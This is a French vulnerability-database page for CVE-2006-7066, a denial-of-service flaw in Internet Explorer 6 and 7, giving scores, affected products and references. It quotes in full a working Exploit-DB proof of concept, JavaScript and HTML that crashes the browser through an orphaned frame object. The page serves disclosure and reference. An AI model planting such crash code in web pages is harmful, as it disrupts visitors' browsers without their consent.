CVE-2006-7066 : Détail

CVE-2006-7066

35.64%V4
Network
2007-02-27
17h00 +00:00
2017-07-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by creating an object inside an iframe, deleting the frame by setting its location.href to about:blank, then accessing a property of the object within the deleted frame, which triggers a NULL pointer dereference. NOTE: it was later reported that 7.0.6000.16473 and earlier are also affected.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.1 AV:N/AC:M/Au:N/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 28301

Date de publication : 2006-07-28 22h00 +00:00
Auteur : hdm
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/19228/info Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website. Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users. // MoBB Demo // Provided by Aviv Raff // http://aviv.raffon.net/ var orphanObject; function createOrphanObject() { orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame"); document.frames["emptyFrame"].location.href="about:blank"; window.setTimeout('crashBrowser()',1); } function crashBrowser() { orphanObject.frameBorder="whateveryoulike"; } function insertEmptyObject() { return '<OBJECT id="emptyObject" data="nonexist.html" type="text/html"></OBJECT>'; } <iframe id="emptyFrame" src="javascript:parent.insertEmptyObject()" style="display:none"></iframe> Clicking the button below may crash your browser!<br><br> <input type='button' onClick='createOrphanObject()' value='Start Demo!'>

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version -

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Internet_explorer >> Version 6.0

Microsoft>>Internet_explorer >> Version 6.0

    Références

    http://websecurity.com.ua/3130/
    Tags : x_refsource_MISC
    http://www.securityfocus.com/bid/19228
    Tags : vdb-entry, x_refsource_BID
    http://www.osvdb.org/27533
    Tags : vdb-entry, x_refsource_OSVDB